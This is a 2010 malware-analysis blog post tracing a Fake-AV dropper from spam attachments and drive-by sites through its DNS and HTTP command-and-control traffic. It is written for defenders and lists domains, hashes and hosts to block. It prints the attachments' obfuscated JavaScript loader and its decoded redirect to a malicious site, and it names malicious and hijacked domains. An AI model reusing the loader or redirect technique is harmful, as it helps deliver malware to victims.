During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).
I’ve first seen the Trojan on 2010-06-08 being dropped by a well known Exploit Kit called NeoSploit. The AV detection rate is pretty good: most of the AV-vendors are currently detecting the binaries which are used to spread the Trojan as Fake-AV. As fare as what I have seen is that this Trojan is just a dropper which drops additional Fake-AV software.
Back in june when I first saw the Trojan I’ve added a signature to AMaDa. Hence AMaDa will tag the binaries and URLs which are associated with this Trojan as DNSTrojan.
In September 2010, I just saw a peak on AMaDa in new URLs propagating DNSTrojan:
Over the past days I’ve saw dozends domain names popping up which are being used to spread the Trojan (using Drive-By exploits). Here are some of them:
hezhexh.co.cc
hezhlhe.co.cc
hezhthu.co.cc
hezlhez.co.cc
hezlhhh.co.cc
hhehshe.co.cc
hheuhhh.co.cc
hhezhez.co.cc
hutahhe.co.cc
hzthezh.co.cc
scaner-ap.cz.cc
scaner-as.cz.cc
scaner-anti.cz.cc
scaner-all.cz.cc
scaner-add.cz.cc
scaner-ac2.cz.cc
scaner-access.cz.cc
scaner-acea.cz.cc
scaner-aced.cz.cc
scaner-acef.cz.cc
scaner-acer.cz.cc
scaner-dual.cz.cc
scaner-fast.cz.cc
scaner-g.cz.cc
scaner-gammi.cz.cc
scaner-go.cz.cc
scaner-h.cz.cc
scaner-hello.cz.cc
scaner-high.cz.cc
scaner-i.cz.cc
scaner-idea.cz.cc
scaner-internet.cz.cc
scaner-ip.cz.cc
As already mentioned before, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:
desktopsecuritycorp.com
desktopsecurityorg.com
desktopsecuritysoft2010.com
desktopsecuritysolution.com
desktopsecuritytech2010.com
securitysoftware2010tech.com
securitysoftwaretech2010ltd.com
*** Spam Mails propagating the DNSTrojan ***
This week I’ve found dozens of Spam mails in my honey pots which have had a HTML file attached. Some of the subject I’ve seen so far are:
- Consultation Appointment
- Questions
- Outstanding invoice – 9386 Ltd
- Nivea commercial payment
- Appraisal – Killington $155000
- Re: GO HOME + SHE SAID / 4.3.2.1./
- Transaction Breakdown
- Offer on Killington
- Fwd: Addendum to extend close of escrow!
- Signatures to Intercreditor
- demands for payment
- Mortgage Breakdown PITI
- notes from last week
- and many more…
The HTML files which are attached to all those spam mails contains JavaScript code:
<script type='text/javascript'>
<!--
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';}
else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1);
}}document.write(m);//-->
</script>
Hum? Obfuscated JavaScript code. If we decode it the following HTML code appears:
<meta http-equiv="refresh" content="0;url=http://blacklefilm.com/x.html" />
The JavaScript coded embedded in the malicious attachment are redirecting the victim to a hijacked website which displays the following message in the web browser:
For now I’ve seen the following hijacked websites involved in this spam campaign:
chautoy.co.za/x.html
numerouno-india.com/x.html
universelles.com/x.html
gvperkins.com/x.html
nobletree.org/x.html
turksagliksen.org.tr/x.html
acquaintive.in/x.html
hesswoodrecycling.com/x.html
equus-ing.com.ar/x.html
barrhavenbia.ca/x.html
annechristene.com/x.html
www.mindconnect.nl/x.html
meltemtvreklam.com/x.html
cernoma.com/x.html
chautoy.co.za/x.html
firstchurchofgodkokomo.org/x.htm
euroiris.cz/x.html
The hijacked website tries to do two things:
- Install the ZeuS Banking Trojan using drive-By exploits (See AMaDa)
- Redirect the victim once again to site which is controlled by the cybercriminals to distribute DNSTrojan
The HTML source code of the hijacked websites (x.html) looks like this:
Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to assure the victim that his computer is infected with malware and offers him a malicious EXE-file:
The binary served by those websites contains the DNSTrojan and is being detected as “Fake-AV” by the most AV-vendors:
File size : 169984 bytes
MD5 : a00b75b0d43702d4b099548b90c715c7
SHA1 : 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33 /43 (76.7%)
As of 2010-09-21 19:00 UTC, the spam campaign is still going on.
*** The DNSTrojan ***
Let take a closer look at the Trojan which is being dropped: The Trojan installs itself into the following directories:
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c.\program files\common files\microsoft shared\TextConv\quillmsconv97.exe
Note that the file names used by the Trojan varies. Additionally the Trojan has a interesting behavior when Apple Quick Time is installed on the victims computer: He will install itself into the Quick Time directory:
c:\program files\apple software updatesoftwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c.\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe
In a next step the Trojan contacts its first Command&Control Server which is located at httpdsconfig.com. But the interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in the first stage:
Standard query response TXT
The Trojan is doing a DNS TXT query to httpdconfig.com every few minutes by using the current UNIX timestamp as subdomain (*unixtimestamp*.httpdsconfig.com).The C&C server replies with a encrypted string (seems to be always the same):
“a0dfe9b34e6c3bc167fc890a20dc283ab8c397eed489f2f737
efceb0064fbba77dc71472b59dde25a2f6f1883ffdc3b1f5ec9
1caf610f02c3b85e8cb831f81e554a83706c8849dd4cfa9ef0c
205c87f5e93f7a5323e71e35d566fe9fc8916717f69304″
Afterwards the Trojan resolves the domain name desktopsecuritysolutionnew.com and will contact a second C&C server located at httpsxy.in. This time the Trojan uses HTTP to communicate with the C&C:
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: httpsxy.in
The C&C server will answer with a HTTP 404 (Not found) but the response also contains encrypted data anyway. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
*encrypted-data*
Last but not least the Trojan query a third C&C server located at httpsbee.in every 30 seconds:
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: httpsbee.in
Note that the p string is a base64 encrypted string containing the values “MACHINE”, “OP” and “TRK”.
*** Conclusion ***
- The Trojan is pretty new (first see in June 2010)
- The detection rate on the Trojan binaries is currently pretty good
- The Trojan uses DNS and HTTP to communicate with the C&C
- The Trojan dropps Fake-AV software (using “getfile.php”)
I recommend you to block the access to the following domain names which are associated with DNSTrojan:
httpsbee.in (204.12.223.186 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsxy.in (69.197.147.188 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpssite.in -
0 Responses to “New Dropper Uses DNS To Communicate”